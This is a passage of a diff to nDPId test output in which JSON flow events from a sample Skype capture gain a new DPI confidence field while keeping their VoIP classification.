-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2946,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969771436,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
